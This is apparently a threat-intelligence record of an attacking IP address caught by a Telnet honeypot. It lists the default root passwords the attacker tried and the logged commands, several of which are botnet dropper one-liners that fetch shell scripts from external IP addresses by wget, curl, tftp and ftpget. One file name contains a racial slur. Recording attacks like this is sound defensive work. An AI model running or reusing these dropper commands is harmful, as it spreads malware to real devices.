Active Threat β’ MEDIUM
176.65.139.16
π―
31
Total Attacks
π
1
Ports
π‘
1
Attack Types
π¦
3
Malware
Geolocation
- Country
- πΈπ¬ Singapore
- City
- Unknown
- ASN
- AS16276
- ISP
- OVH SAS
Attack Types
cowrie
Attacked Ports
23
Associated Malware
Attempted Credentials
πroot/root
2xπroot/1234
1xExecuted Commands
$
uname -m3x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:8080/ez_nigger_xdd.sh || curl -O http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox wget http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox tftp 48.200.96.137 -c get ez_nigger_xdd.sh || busybox tftp -r ez_nigger_xdd.sh -g 48.200.96.137 -l ez_nigger_xdd.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 ez_nigger_xdd.sh ez_nigger_xdd.sh || tftp 48.200.96.137 -c get ez_nigger_xdd.sh || tftp -r 1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:666/payload.sh || curl -O http://48.200.96.137:666/payload.sh || busybox wget http://48.200.96.137:666/payload.sh || busybox tftp 48.200.96.137 -c get payload.sh || busybox tftp -r payload.sh -g 48.200.96.137 -l payload.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 payload.sh payload.sh || tftp 48.200.96.137 -c get payload.sh || tftp -r payload.sh -g 48.200.96.137 -l payload.sh || ftpget -v -u1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all1xRisk Assessment
40
/100
LowMediumHighCritical